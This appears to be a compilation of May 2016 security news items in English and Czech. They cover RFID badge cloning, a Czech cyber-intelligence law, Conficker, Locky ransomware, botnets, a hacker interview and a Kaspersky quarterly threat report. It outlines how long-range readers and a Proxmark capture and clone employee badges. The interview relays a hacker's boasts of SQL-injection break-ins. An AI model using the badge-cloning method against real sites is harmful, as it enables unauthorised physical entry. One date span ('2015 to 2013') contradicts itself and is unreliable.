“Standing outside the main office of a power company in the Midwest, a hacker known as metrofader pulls an employee’s electronic badge out of his pocket and waves it at an outside sensor. The door unlocks, even though it’s a fake card made with data stolen earlier that day.“
According to the researchers from RedTeam Security, hackers could purchase a $350 device available on both from Amazon or eBay to bypass access control systems based on employee ID badges by manufacturing counterfeit access cards.
The experts explained to journalists at Tech Insider that it is very easy to clone an access card belonging to any employee without stealing employee personal information.
Source Tech Insider
Matt Grandy from the RedTeam firm explained that they used a particular device that costs just $350 while visiting a target company.
“[We] got the big, long range reader from Amazon,” RedTeam Security consultant Matt Grandy said. “They’re also all over on eBay.” “They’re also all over on eBay.”
A hacker from the firm pretended to visit a company by posing as a student who requested a tour, he carried the device in a laptop bag that. The device is able to intercept the unencrypted communication between an employee access card and the access control systems used to open/close the doors.
The RFID badge reader offered for sale on Amazon and eBay is able to capture access card data up to three feet away and writes it on a microSD card.
The attacker just needs to be in the proximity of a known employee while he is using his RFID badge.
The attacker can then write the access data captured by the device on a fake employee badge, the operation is very simple by using a second device dubbed Proxmark that cost $300.
The fake badge could be used to access the target company.
“RedTeam exploited a well-known issue with RFID, or radio-frequency identification, which is a common method many organizations use to give employees access to facilities. Employees typically hold up their RFID-coded badges to an electronic reader outside a door, which then tells the door, “Hey, let this person in.“” states the Tech Insider. “The problem is that much of the time, that data is sent in the clear without encryption, giving hackers an opportunity to snatch the data right off an employee’s card so they can clone it for their own purposes.”
Of course, in order to improve the physical security, it is possible to encrypt data, another good measure to adopt to protect access cards are the RFID-blocking sleeves.
Na hackery si došlápnou i vojenští zpravodajci
9.5.2016 Bezpečnost
Konflikty na Ukrajině a v Sýrii ukazují, že útok hackerů může ohrozit obranu státu stejně jako cizí armáda. Vojáci kybernetickou válku už zařadili na roveň pozemním a leteckým operacím.
Podle informací Práva už začali zpravodajci budovat v Praze centrálu, z níž budou sledovat podezřelé pohyby na síti. Ilustrační snímek
Zbraně proti hackerům mají po policii nově získat i armádní špióni. Ti by podle novely zákona o Vojenském zpravodajství, které ministerstvo obrany už poslalo do připomínkového řízení, měli dostat možnost používat např. sledování a odposlouchání i na poli kybernetické obrany.
Návrh zákona nařizuje pod hrozbou finanční sankce operátorům a poskytovatelům internetu umožnit armádním špiónům napojit se na počítačovou síť a monitorovat ji. Za tuto službu a za poskytnutá data by měla obrana platit.
Podle informací Práva už začali zpravodajci budovat v Praze centrálu, z níž budou sledovat podezřelé pohyby na síti. V případě, že zjistí nepravosti, budou moci proti hackerům zasáhnout.
„Konkrétní nasazování a používání technických prostředků bude stanovovat vláda jako kolektivní orgán, čímž bude zajištěna nezbytná míra kontroly nad činností Vojenského zpravodajství v této oblasti,“ stojí v materiálu.
Útočníky odstřihnou
Jaké konkrétní prostředky budou moci zpravodajci nasadit, obrana z bezpečnostních důvodů nezmiňuje, aby neodkryla své slabiny. Je ale jasné, že v případě podezření budou zpravodajci moci sledovat nejen formální znaky datového toku, ale i jeho obsah.
V nedávném rozhovoru pro Právo šéf Vojenského zpravodajství Jan Beroun naznačil, co jeho podřízení budou dělat.
„Nejdříve budeme muset poznat, jací jsou protivníci a jaké mají chování. Nejjednodušší obrana samozřejmě je, že budeme mít schopnost vypnout elektronický tok, odkud útok bude přicházet. Ale musíme mít dopředu analyzované, jaké dopady takový krok bude mít, aby nepřinášel větší škody než samotný útok,“ prohlásil Beroun.
Dodal, že ochrana by se měla týkat především útoků, které „míří na srdce, na klíčové systémy státu“, a to nejen ministerstva, ale třeba i na jaderné elektrárny.
Také počítačový odborník Tomáš Přibyl předpokládá, že zpravodajci dostanou možnost útočníky odpojit. „Určitě budou mít možnost zjistit maximum informací o zdroji i o detailech komunikace, aby útok mohli odrazit, tedy odstřihnout od sítě,“ řekl Právu Přibyl, který v Řitce u Prahy provozuje výcvikové centrum proti kybernetickým útokům.
Neumím si představit, že by vláda byla tak rychlá, aby se v případě potřeby okamžitě sešla, aby věc schválila
Andor Šándor, bývalý šéf vojenských zpravodajců
Podle odborníků jde zákon dobrým směrem, ale může přinést řadu komplikací a pokušení. „Těžko něco proti takovému návrhu namítat,“ řekl Právu bývalý šéf vojenských zpravodajců Andor Šándor. Podle něj ale zní alibisticky ustanovení, kdy by o použití technických prostředků k zabránění kyberútoku měla rozhodovat vláda.
„Neumím si představit, že by vláda byla tak rychlá, aby se v případě potřeby okamžitě sešla, aby věc schválila,“ uvedl. Expert na kybernetickou bezpečnost Vladimír Lazecký má obavy, aby špióni nedostali větší pravomoci, než potřebují.
„Tento návrh mi nevadí, ale za velmi nebezpečné bych považoval to, o co se snaží v USA či v Británii, kdy nutí lidi, kteří si komunikaci šifrují, aby jim poskytli dešifrovací klíče, a když to neudělají, tak je kriminalizují,“ řekl Právu.
Dnes má podle zákona na starosti kybernetickou bezpečnost Národní bezpečnostní úřad (NBÚ). V Brně provozuje centrum, které pomáhá státním institucím i důležitým podnikům bojovat proti hackerům.
Podle mluvčího NBÚ Radka Holého nevnímají plány resortu obrany jako konkurenci. „Určitě to nebude kolidovat. Od počátku jsme s obranou ve spojení a pomáháme si,“ sdělil Právu.
Nejrozšířenější počítačová hrozba dělá expertům vrásky na čele. Znovu
8.5.2016 Viry
Bezpečnostním expertům dělá opět vrásky na čele zákeřný červ Conficker. Ten koluje internetem už od konce roku 2008, přesto se jeho aktualizované verzi podařilo v prvním čtvrtletí letošního roku opět dostat až na samotný vrchol žebříčku nejrozšířenějších počítačových hrozeb. Vyplývá to z analýzy bezpečnostní společnosti Check Point.
Conficker byl nejrozšířenější hrozbou prakticky po celý rok 2009, pak se po něm slehla na několik měsíců zem. V letošním roce jej ale počítačoví piráti začali opět hojně využívat, díky čemuž se z něj stala nejrozšířenější hrozba, a to v tuzemsku i zahraničí.
V současnosti je tento červ zodpovědný za každý pátý útok na síti. Je tedy dvakrát rozšířenější než druhá nejrozšířenější hrozba – virus Sality, který umožňuje útočníkům vzdálené ovládání napadeného stroje a instalaci dalších nezvaných návštěvníků. Sality byl v minulých měsících zodpovědný za každý desátý útok.
Conficker využívá zranitelnost operačního systému Windows. Pro tu už dávno existuje bezpečnostní záplata, ale jak je ze statistik zřejmé, s její instalací si velká část uživatelů hlavu neláme. Na konci dubna se dokonce ukázalo, že se tento nebezpečný červ uhnízdil v počítačích v bavorské jaderné elektrárně Gundremmingen.
Autoři Confickera vybudovali po celém světě velkou síť infikovaných PC, využitelných na libovolnou úlohu, poněvadž počítače mohou díky viru ovládat na dálku. Na jeho řízení použili autoři červa inovativní způsob. Každý den se vygenerují nové náhodné domény, kam se vir hlásí a žádá instrukce.
Dokáže zablokovat antiviry
Tím prakticky bezpečnostním expertům znemožňují, aby mohli Confickera zcela vyřadit z provozu. Většina antivirových programů by si nicméně i s tou nejnovější verzí měla poradit.
V některých případech ale prostřednictvím červa dovedou bezpečnostní programy v počítači odhalit. Pak mohou s jeho vystopováním pomoci nejrůznější on-line antivirové skenery.
Jak se proti několik let starému červovi bránit? Bezpečnostní experti důrazně doporučují nainstalovat do počítače všechny přístupné bezpečnostní aktualizace, které jsou dostupné přes systém automatických aktualizací nebo přes stránku Windows Update.
Liberty Reserve founder sentenced 20 years in jail
8.5.2016 IT
Arthur Budovsky, the co-founder of the online underworld bank Liberty Reserve, was sentenced to 20 years in prison for committing money laundering.
Arthur Budovsky, the co-founder of the online underworld bank , was sentenced to 20 years in prison. The man had pleaded guilty to one count of conspiring to commit money laundering. He was condemned to have laundered money for several criminal activities, including child pornography, credit card fraud and drug sale.
Budovsky, who was arrested in Spain in May 2013, he tried to avoid prosecution by acquiring Costa Rica nationality.
It has been estimated that the Costa Rica-based Liberty Reserve processed more than $8 billion worth of transactions for more than 5.5 million users worldwide in the period from 2015 to 2013 when it was shut down by law enforcement. According to the US Department of Justice more than 600,000 users were in the United States.
“The significant sentence handed down today shows that money laundering through the use of virtual currencies is still money laundering, and that online crime is still crime,” Assistant Attorney General Leslie R. Caldwell for the Justice Department’s Criminal Division said in a statement.
“Liberty Reserve founder Arthur Budovsky ran a digital currency empire built expressly to facilitate money laundering on a massive scale for criminals around the globe,” US Attorney Preet Bharara for the Southern District of New York was quoted as saying.
Budovsky was also ordered to pay a $500,000 fine by US District Judge Denise L. Cote.
Criminals used Liberty Reserve used the popular service as a financial hub that allowed them to operate anonymously.
Budovsky confirmed with the authorities to have laundered roughly $550 million in transactions made by US-based Liberty Reserve accounts.
The man was not alone, other six people face charges in the case, the accomplices Maxim Chukharev and Mark Marmilev were sentenced to three and five years respectively.
Others two accomplices are set to be sentenced next week and another two remain at large.
Hacker Interviews – The hacker: zurael sTz
8.5.2016 Hacking
This is the first of a series of “Hacker Interviews” that will aim to help us get a better understanding of the motivations and techniques of the hackers.
The information security industry spends time and effort not only to stop hackers but also to understand and simulate them. Vulnerability assessments and penetration tests are specially designed to understand what a criminal hacker could do. Security Affairs is one of the leading information security news sources on the internet and has decided to contribute to the collective effort in understanding the criminal hacker. This is the first of a series of “Hacker Interviews” that will hopefully help us get a better understanding of the motivations and techniques of the hackers. Please feel free to send us an email if there are any particular hacker or attack technique you’d like us to investigate.
The mail starts with “Hello, My name is zurael sTz”.
@zurael_sTz is one of the many Twitter accounts that publish their latest hacks. We have been following this account for sometime and have noticed it’s very typical of the politically motivated hacker profile. He hacks target mostly Palestinian websites with occasionally a Libyan or Egyptian site.
Another trait of this account is its use of the same technique. We usually face 3 different kind of hackers categorized based on their skill levels as “simple”, “smart” and “advanced”. The largest group is the “simple” attacker. A group that is very crowded as this is where “script kiddies” are. They have limited technical knowledge and rarely target their attacks. The second group we call “smart” is very close to this account. Members of this group are generally good in one specific attack and can target their attacks. @brutelogic would be a good example for a smart attacker who has mastered XSS (Cross Site Scripting) attacks and Zurael almost exclusively uses SQL injections. This focus on a specific attack technique, while having its limitations, makes this group more dangerous for government agencies and companies worldwide. In the last group are “advanced” attackers where we see APT gangs.
Seeing an opportunity to better understand what motivates the “smart” attacker we have sent Zurael a series of questions.
What are the motivations?
I like my job, I keep the security of Israeli citizens against attacks #opIsrael
Success, it’s one of the motivations to continue saving the citizens of Israel Online
What was your greatest challenge?
I broke into the website of the Palestinian Wafa news agency
I broke into the Palestinian Health Office in
I started to find radio Jenin
Etc. The list is long, and now, the breaking and entering into the Syrian Ministry of Transport (details coming soon)
What was your largest hack?
It’s complicated. Mainly large companies, Bank of Palestine, but will not talk about it so as not to risk.
Are you an IT professional?
I was a military role, now I work in a small company
How do you choose your targets?
Who harms the State of Israel, will not be immune to attack my
What are the tools you use?
I usually do not use any software
How do you find your targets?
I’m a guy purpose (a) and finds error and penetrates sql injection manually
The answers above show that the hacker isn’t motivated by personal gain or money but rather politically. The targets are probably chosen based on their locations (or domain) and on the presence of an exploitable SQL injection vulnerability.
There are two main lessons we can learn from the answers given by the hacker.
First, every website is under attack. One reaction I often from my customers who aren’t government or financial institution is “no body who attack us anyway”. The fact that you are not a defense industry company doesn’t make you immune to attacks. Opportunistic hackers looking for a specific vulnerability wouldn’t hesitate to exploit it if they found it on your systems. Also, your domain name (.ps, .co.il, .pk, .ru, etc.) might be enough to attract hackers.
The second important lesson is that we should rethink our understanding of cybrwar. Images of the U.S. Cyber Command, the Israeli Unit 8200, the Chinese Specialized Military Network Warfare Forces or the Iranian Cyber Defense Command come to mind anywhere we hear the words “cyberwar”. This misrepresentation usually leads to the false belief that our corporate networks are free from any potential politically motivated attacks. However, as seen from the above profile, any individual or civil group can chose to act based on what they believe is in the interest of their country. Which would make us victims of a politically motivated attack without being part of any political conflict.
Journey of a ‘Hacked Computer’ : From Torrents to Botnets
8.5.2016 BotNet
One out of every three websites were involved in transmitting malware to their users, which was found attached to their digital content.
Suppose, there is a movie, released last month. You didn’t have the time to watch it in the theatre and you also want to save some money. What would you do? Go to any one of the torrent sites and download it.It’s THAT simple. Isn’t it?
Have you ever wondered why is that is so simple? Here’s the answer.
It’s all about money. When you downloaded a movie/a cracked software or any kind of pirated material for free from torrent sites. They may provide you that cracked software or a 1080p HD movie and a malware bound with it. This malware is mostly ‘Trojans’ which steal every sensitive information they can, from your computer including your passwords, pictures from webcam, other documents and can also lock your computer in exchange for a ransom or mine bitcoins using your computer!
Apart from stealing critical information, this malware are capable of making your device part of a ‘Botnet Army’ along with millions of other victims like you. Botnets are controlled by their command and control servers, also called as ‘C&C Servers’ or ‘C2 Servers’. Access to these millions of devices is also given to the black hats for rent .The rent depends upon the number of systems, their hardware configuration, operating systems and the duration of their usage. Black hats / cyber-criminal groups such as ‘APT29’ use them as digital slaves for spamming, performing DDOS attacks, harvesting credentials and for other malicious operations.
According to RiskIQ, a San Francisco-based cybersecurity company, which was authorized by the Digital Citizens Alliance (DCA) to conduct the study titled as “Digital Bait” which scanned 800 websites with pirated content.” It was realized, one out of every three websites were involved in transmitting malware to their users, which was found attached to their digital content”.
The earning of these pirate websites is estimated to be around $70 Million a year.once a device is a part of the ‘botnet army’, also called as a ‘zombie’ it can be used for many malicious activities such as DDOS attack, spreading of other malware etc. without the user’s consent. The banking information stolen from these victims are sold in the ‘black market’ for around $2 – $130 per credential.
Here are some screenshots, I acquired from social media that may give you an idea on the working of botnets and their command and control servers.
Typical botnet topologies include:
Star, in which the bots are controlled by a central server.
Multi-server, in which there are multiple C&C servers for redundancy.
Hierarchical, in which there are multiple C&C servers.They are organized into tiered groups.
Random, in which there is no C&C server at all. Co-opted computers communicate as a peer-to-peer botnet (P2P botnet).
For example, The SpyEye and Zeus botnets have also been extremely profitable and widespread for their commanders. Both steal banking credentials from victims and automate the process of grabbing money from accounts. The creators of Zeus botnet sold it to various criminal gangs who infected more than 13 million computers with it from 2008 on, and used it to steal more than $100 million. The cyber security firms estimate that botnets, over time, have resulted in more than $110 Billion in losses to victims all over the world. An estimated 500 Million computer devices are infected via botnet attackers annually, which is around 18 victims infected per second.
There is always a ray of hope. According to Symantec’s Internet Security Threat Report, Volume 21 (Apr 2016), There are 1.1M bots in 2015, decreased 42%, while comparing to the number of bots in 2014, which was 1.9M.
Various CERTs,IT security firms and law enforcement agencies are working together to fight global cyber crime. In December,2015 the INTERPOL took down a ‘Dorkbot’ botnet in coordination with Microsoft,CERT Polska, ESET,US Department of Homeland Security’s United States Computer Emergency Readiness Team(US-CERT), the Indian Central Bureau of Investigation(CBI), Europol, Canadian Radio-television and Telecommunications Commission, US Federal Bureau of Investigation(FBI), the Royal Canadian Mounted Police, National Central Bureau in Russia, the Russian Ministry of Interior Department K and the Turkish National Police.
Dorkbot was used to carry out the following activities using its victims’ computers.
Stealing keystrokes from banking websites or online payment websites.
Performing Distributed denial of service attacks.
Providing a mechanism to download other dangerous malwares.
Same as many botnets, Dorkbot was spread via USB Flash drives, social networks and instant messaging software,you are advised to scan your computers with anti-virus software regularly.
Just like Dorkbot,there are several botnets taken down by joint efforts of the law enforcement agencies and cyber security companies.which involves takedown of Simda botnet,Dridex botnet and Ramnit botnet.some of them may continue to propagate.
You can always stay safe using up-to-date anti-virus software, firewalls etc.if you suspect a file to be malicious, always use a sandbox to execute it. According to the industry’s estimated infection reports, in the few minutes it took you to read this article, more than 3,000 new computers have joined the botnet army.
STUPID LOCKY! Hackers disrupted a Locky ransomware Campaing
8.5.2016 Virus
Hackers have disrupted a Locky campaign after they compromised one of the cybercriminal servers used by the threat actors.
According to the security expert Sven Carlsen from Avira, hackers have dismantled a Locky campaign by hacking the command and control server. Carlsen explained that threat actors behind the Locky campaign spread the threat via spam email with a malicious attachment.
The attachment was a downloader that fetches the Locky ransomware from a server generated with a domain generation algorithm (DGA) and executes it.
While the researchers from Avira were analyzing the threat discovered that the downloader fetches a 12Kb executable containing the message “STUPID LOCKY,” instead the Locky Ransomware binary. Of course, this causes the failure of the attack resulting in an error message being displayed.
What happened?
Most likely hackers breached C&C server and replaced the code of the Locky ransomware with a harmless file.
“It seems that someone was able to access one of the command and control servers and replaced the original Locky ransomware with a dummy file. And I do mean dummy in the fullest expression of the word.” Carlsen wrote.
In the past, other cyber vigilantes have disrupted the hacking campaigns of crooks, Earlier 2016, white hats have attempted to shut down the distribution channels of the Dridex botnet and replaced the malware with a clean copy of an Avira antivirus application.
“I don’t believe that cybercriminals themselves would have initiated this operation because of the potential damage to their reputation and income stream. I also wouldn’t say that ‘Locky is dead’ after this operation,” Carlsen added. “As we know, they are still active and understand their ‘business’ very well. But after the examples of Dridex and now Locky, it shows that even cybercriminals, masters of camouflage, are also vulnerable.”
Like the CryptoWall ransomware, Locky uses to change the filenames of encrypted files to make harder data recovery.
When started, Locky creates and assigns a unique 16 hexadecimal number to the infected machine, then he will scan all drives and unmapped network shares for files to encrypt.
The malware uses the AES encryption algorithm and encrypts only file with extensions matching a certain criteria while it skips files containing certain strings in their full pathname and filename (i.e. tmp, winnt, Application Data, AppData, Program Files (x86), Program Files, temp, thumbs.db, $Recycle.Bin, System Volume Information, Boot, and Windows).
Locky is able to encrypt more than 160 different file types on compromised PCs and victims are asked to pay between $220 and $880 to recover their documents.
The Locky ransomware encrypts files renaming the to [unique_id][identifier].locky, the researchers also discovered that the unique ID and other information are embedded at the end of the encrypted file.
The malware will also delete all of the copies of documents in the Shadow Volume, making impossible to restore files.
Locky leaves a ransom note, the _Locky_recover_instructions.txtin, in each folder containing encrypted files.
IT threat evolution in Q1 2016
7.5.2016 Zdroj:Kaspersky PDF
Q1 figures
According to KSN data, Kaspersky Lab solutions detected and repelled 228,420,754 malicious attacks from online resources located in 195 countries all over the world.
74,001,808 unique URLs were recognized as malicious by web antivirus components.
Kaspersky Lab’s web antivirus detected 18,610,281 unique malicious objects: scripts, exploits, executable files, etc.
There were 459,970 registered notifications about attempted malware infections that aim to steal money via online access to bank accounts.
Crypto ransomware attacks were blocked on 372,602 computers of unique users.
Kaspersky Lab’s file antivirus detected a total of 174,547,611 unique malicious and potentially unwanted objects.
Kaspersky Lab mobile security products detected:
2,045,323 malicious installation packages;
4,146 mobile banker Trojans;
2,896 mobile ransomware Trojans.
Overview
2016 has only just got underway, but the first three months have already seen the same amount of cybersecurity events that just a few years ago would have seemed normal for a whole year. The main underlying trends remained the same, while there was significant growth in trends related to traditional cybercrime, especially mobile threats and global ransomware epidemics.
Ransomware became the main theme of the quarter after knocking targeted attacks from the top of the most popular threat rating. Unfortunately, this is a situation that will continue to evolve, and those behind the extortion could well end up being named “problem of the year”.
Targeted attacks
BlackEnergy2/3
The BlackEnergy cyberattack on the Ukrainian energy sector was the most high-profile incident. Although it occurred at the end of last year, a fuller picture of what happened only appeared in the course of the subsequent analysis. Moreover, attempts by cybercriminals to arrange new attacks continued in 2016.
The attack was unique because of the damage it caused – the hackers managed to disable the power distribution system in Western Ukraine, launch the Wiper program on the targeted systems and carry out a telephone DDoS on the technical support services of the affected companies.
There were numerous publications about the attack, and Kaspersky Lab’s experts revealed several aspects of the activities of the group responsible. In particular, they published an analysis of the tool used to penetrate the systems – a malicious DOC file.
For those who want to learn more about the attack, we recommend the report prepared by the American SANS Institute and ICS-CERT.
Poseidon
In February, the experts at Kaspersky Lab revealed details about the activities of Poseidon – the first Portuguese-speaking targeted attack group which had set up a custom-tailored malware boutique.
Although the report was only released in 2016, the group has been operational for a long time. Malware campaigns that were most probably supported by Poseidon were detected as far back as 2005, while the first sample dates back to 2001. Poseidon’s arsenal is focused primarily on the Microsoft Windows operating system family: from Windows 95, which the group targeted in its early days, to Windows 8.1 and Windows Server 2012, which were targeted by the most recently detected malware samples.
In Q1 2016, @kaspersky repelled 228M malicious attacks from online resources located in 195 countries #KLreport
The attack scenario is carefully tailored to the victim. Although the initial infection occurs according to the same scenario, the following stages of the campaign specifically customize the infection method for each new victim. That is why the specialists from the Global Research & Analysis Team (GReAT) decided to call Poseidon a “custom-tailored malware boutique”.
Having gained access to the corporate network, the criminals move across the network and collect as much data as possible in order to escalate their privileges, create a network map and to identify the computer they need. The main target of the attack is usually the local Windows domain controller. Once they have control over it, the attackers can steal intellectual property, data, trade secrets, and other valuable information.
The information collected by Poseidon for its owners was in most cases used to blackmail victim companies into contracting the Poseidon Group as a security firm. Regardless of whether a contract was signed, Poseidon remained on the network.
Hacking Team
Yet another infamous “boutique” creating cyber-espionage tools, the Italian company Hacking Team, fell victim to a cyberattack last year in which a huge database of its employee email correspondence was stolen, as well as project source codes.
The incident revealed a lot of problems in the work of the company and many thought it would be very difficult for the business to develop further. However, at the beginning of 2016 new Hacking Team implants for OSX were found. This indicates that the group has no intention of halting its work and is continuing to develop in the sphere of secondary operating systems. This means their “creations” will continue to be a problem for users who have become an object of interest for HT customers.
Yet another story related to Hacking Team was the hunt for a Microsoft Silverlight 0-day. Information about the possible presence of this vulnerability was found in the Italian company’s documents. Based on very little initial data and armed with the Yara and VirusTotal tools, our experts set a trap and waited. And sure enough, they detected a 0-day exploit.
Operation BLOCKBASTER
Kaspersky Lab was among the participants in operation Blockbaster, a joint investigation conducted by several major IT security companies. The subject of the investigation was activity by the Lazarus Group, a cybercriminal gang of supposedly North Korean origin that was involved in the attack on Sony Pictures in 2014.
The Lazarus Group has been around since 2009, but their activities moved up a gear from 2011. The group is responsible for such well-known attacks as Troy, Dark Seoul (Wiper), WildPositron. During the investigation over 40 different types of malicious program, which they had created over the years, were detected. In particular, the group used their malware to attack companies, financial institutions, radio and television. Use of exploits for 0-day vulnerabilities was also recorded.
Hospitals under attack
This section on targeted attacks should also include Sergei Lozhkin’s research on how hackers can penetrate the internal network of hospitals and gain full access to patient data using publicly available tools and services.
Unfortunately, medical institutions are being targeted more and more by such attacks. In the first quarter of 2016, there were several incidents of hospital networks being infected with various types of Trojan ransomware that encrypts data and demands a ransom to decrypt it.
The latest incident was an attack on the MedStar network that affected 10 hospitals. According to the network’s official report, the data was saved without paying a ransom to the blackmailers, while another hospital in California ended up paying $17,000 for a ransomware crypto key.
Cybercrime
Adwind
At the Security Analyst Summit 2016 (SAS 2016) our GReAT experts presented the results of their investigation into the Trojan known as Adwind RAT (Remote Access Tool). Having studied the activity of the malware, the researchers came to the conclusion that even the story behind the Trojan’s creation was out of the ordinary.
The Trojan was developed continuously over several years, with the first samples appearing in 2012. It has had different names at different times: in 2012, the creators were selling it as Frutas; in 2013 it was called Adwind; in 2014 the Trojan was known as Unrecom and AlienSpy; and in 2015 it was named JSocket.
The GReAT experts believe that Adwind and all its incarnations have been developed by one hard-working hacker who has been releasing new features and modules for four years.
The Adwind platform was initially only available in Spanish, but an English-language interface was added later, allowing cybercriminals worldwide to evaluate it. The main users of this Trojan are those conducting advanced cyber fraud, unscrupulous competitors, as well as so-called Internet mercenaries who are paid for spying on people and organizations online. Adwind can also be used by anyone wishing to spy on their friends.
Geographically, the biggest concentration of victims has also changed over the last four years. In 2013, the targets were mostly in Spanish- and Arabic-speaking countries. The following year, cybercriminals focused on Turkey and India, as well as the United Arab Emirates, the United States and Vietnam. In 2015, Russia topped the rating with the United Arab Emirates, Turkey, the United States and Germany close behind.
Fortunately, our investigation was not in vain – a few days after its publication, the JSocket website stopped working and the Adwind author ceased their activity. Since then, no new versions of the Trojan have appeared. Perhaps we can expect another reincarnation of the Trojan, or maybe this is the end of the story.
Banking threats
At the Security Analyst Summit (SAS in 2016), Kaspersky Lab announced the discovery of two new gangs engaged in APT-style bank robberies – Metel and GCMAN – and the reemergence of the Carbanak group with new targets in its sights.
In 2015, Kaspersky Lab researchers conducted incident response investigations for 29 organizations located in Russia that were infected by these three groups.
There are other cybercriminal groups currently attacking banks in Russia, but these three are the most active and are involved in the most high-profile thefts from both customer bank accounts and the banks themselves.
The activity of Carbanak 2.0 is of particular interest. In December 2015, Kaspersky Lab confirmed that the group was still active after discovering signs of Carbanak in a telecommunications company and a financial organization. An interesting feature of the Carbanak 2.0 group is that they have a different type of victim. The group has moved beyond banks and is now targeting the budgeting and accounting departments of any organization that interests them, using the same APT-style tools and techniques.
In one remarkable case, the Carbanak 2.0 gang used its access to a financial institution that stored information about shareholders to change the ownership details of a major company. The information was modified to name a money mule as a shareholder of the company, displaying their IDs.
FakeCERT
Yet another criminal gang known as Buhtrap came to the fore in the first quarter. It is responsible not only for the theft of hundreds of millions of rubles from Russian banks but also for organizing a targeted attack on banks using the names and attributes of FinCERT, a special department of the Central Bank of Russia created to detect cyberattacks and notify member banks. It was the first time that attackers had used the FinCert “brand” and the attack was carefully prepared; a corresponding domain name was created and the identifiers used by FinCERT were studied closely.
The malicious mass mailing affected hundreds of banks in Russia. The attackers have a database of their employee email addresses, including names and surnames. A legitimate remote administration tool was used as the remote access module installed in the system.
Bangladesh
On the global arena, the most prominent attack on banks was that involving the Central Bank of Bangladesh. It was not just the object of the attack – the Central Bank – that was remarkable but also the amount of money the attackers managed to steal, plus the amount they tried to steal but failed.
The investigation is still ongoing, but according to the information that has been made public, it is possible to put together a picture of what happened. Back in early February, hackers managed to access the workstations of several employees at the national bank. Using their identities, the fraudsters began to send out transfer orders for money held in different banks including the New York Federal Reserve Bank. With full access and posing as employees, they were able to steal approximately $80 million. The money was transferred to accounts in the Philippines and then passed through a money-laundering scheme involving local casinos and forex brokers.
In Q1 2016, 74M unique malicious URLs recognized by @kaspersky #antivirus components #KLreport
Another $20 million would have been transferred to Sri Lanka, but the hackers made an error in the name of a recipient organization; this aroused the suspicion of Deutsche Bank, which was the correspondent bank of the Central Bank of Bangladesh. An investigation found that the payment order had been initiated by hackers, and approximately $900 million was still waiting to be transferred.
It’s worth noting that Bangladesh’s Minister of Finance only learned about the incident a month later from the mass media. The head of the Central Bank was forced to resign, the investigators are currently trying to trace those responsible, and the bank is taking measures to return at least some of the stolen funds.
Ransomware Trojans
As we mentioned above, ransomware Trojans were the main theme of the quarter and could well become the main problem of the year.
Making the situation worse is the fact that a number of ransomware Trojans have become accessible to anyone with a little bit of cyber know-how in the form of source code. As a consequence, even the average script-kiddy can deploy their own version of the Trojan which, together with the active use of Bitcoin for paying ransoms, makes it much easier to organize attacks with impunity.
Moreover, the term Ransomware-as-a-Service (RaaS) has already come into use. This involves the attackers offering to pay for Trojan distribution, promising a cut of any ransom money received. The clients of these services are usually webmasters of porn sites. There are services that work the other way round, offering a complete set of tools to the encryptor who takes responsibility for distributing the Trojan and takes 10% of the ransom as commission.
According to reports from several companies, the first quarter of 2016 saw incidents where ransomware was used by a number of well-known APT-groups, mainly Chinese. We also identified similar cases, and not only involving Chinese groups. If these incidents become a trend, the threat will move to a new level because the damage caused by ransomware is not much different from that caused by Wiper-type Trojans. In both cases, user data becomes inaccessible.
In addition, ransomware Trojans are expanding their sphere of activity; in Q1 2016, CTB-Locker targeted web servers.
The earlier version of CTB-Locker known as crypto-ransomware Onion differed from other ransomware in that it used the anonymous network Tor to protect its command servers from being disabled because, as a rule, it is only possible to disable static servers. The use of Tor also helped the malware avoid detection and blocking. There was one more thing that protected CTB-Locker operators: payment was only accepted in Bitcoins, a decentralized anonymous cryptocurrency.
The new version of this malicious program encrypts web servers, and demands less than half a Bitcoin (~ $150) as ransom. If the money is not paid on time, the ransom is doubled to about $300. Once the ransom is paid, a key is generated to decrypt the web server files.
However, the biggest crypto epidemic of Q1 2016 was caused by the ransomware Trojan Locky (detected by Kaspersky Lab products as Trojan-Ransom.Win32.Locky).
This Trojan is continuing to spread; Kaspersky Lab products have recorded attempts to infect users in 114 countries around the world.
In order to spread the Trojan, the cybercriminals use mass mailings in which malicious loaders are attached to spam messages. Initially, the malicious spam messages contained a DOC file attachment with a macro that downloaded the Locky Trojan from a remote server and executed it.
At the time of writing, the malicious spam is still being sent, but instead of DOC files being attached there are now ZIP archives containing one or more obfuscated scripts in JavaScript. The messages are mostly in English, though some bilingual variants have appeared.
The most significant technical innovation in ransomware was full disk encryption (more specifically, encryption of the file system table) rather than file encryption. This trick was used by the Petya Trojan (the fact that it has a Russian name does not necessarily mean that it was created by Russian-language malware writers).
After encrypting the main file table, Petya shows its true face – a skull and crossbones composed of ASCII characters. Then the typical encryptor routine begins: the Trojan demands a ransom from the victim, 0.9 Bitcoin (about $380) in this case.
At this stage, the only thing that distinguishes Petya from other ransomware is the fact that it operates without an Internet connection. This is hardly surprising though, because Petya basically “eats” the operating system, including its ability to connect to the Internet. This means the user has to go to another computer to pay the ransom and recover their data.
In March, yet another encryptor for Mac OS X was discovered – Trojan-Ransom.OSX.KeRanger. The attackers used it to infect two BitTorrent client installers from the open source Transmission project, which were available for download on their official website. Most likely, the project site was hacked, and the files for download were substituted for malicious recompiled versions. The KeRanger Apple encryptor was signed with a valid Apple certificate, and could therefore bypass the Gatekeeper security feature.
Statistics on Trojan encryptors
Encryptors belong to the Trojan-Ransom class of malware, i.e. to ransomware. Today, in addition to encryptors this class of malicious programs also includes so-called browser ransomware. In the general flow of Trojan-Ransom detections the share of browser ransomware accounts for 25%, and that is mainly in Russia and the CIS. In this section, we will not dwell on browser ransomware, but will look at malicious encryptors in more detail.
The number of new Trojan-Ransom encryptors
The following graph represents the rise in the number of newly created encryptor modifications over the last two quarters.
Number of Trojan-Ransom encryptor modifications in Kaspersky Lab’s Virus Collection (Q4 2015 vs Q1 2016)
The overall number of encryptor modifications in our Virus Collection to date is at least 15,000. Nine new encryptor families and 2,900 new modifications were detected in Q1.
The number of users attacked by encryptors
Number of users attacked by Trojan-Ransom encryptor malware (Q1 2016)
In Q1 2016, 372,602 unique users were attacked by encryptors, which is 30% more than in the previous quarter. Approximately 17% of those attacked were in the corporate sector.
It is important to keep in mind that the real number of incidents is several times higher: the statistics reflect only the results of signature-based and heuristic detections, while in most cases Kaspersky Lab products detect encryption Trojans based on behavior recognition models and issue the Generic verdict, which does not distinguish the types of malicious software.
Top 10 countries attacked by encryptors
Country* % of users attacked by encryptors**
1 Italy 3.06
2 Netherlands 1.81
3 Belgium 1.58
4 Luxembourg 1.36
5 Bulgaria 1.31
6 Croatia 1.16
7 Rwanda 1.15
8 Lebanon 1.13
9 Japan 1.11
10 Maldives 1.11
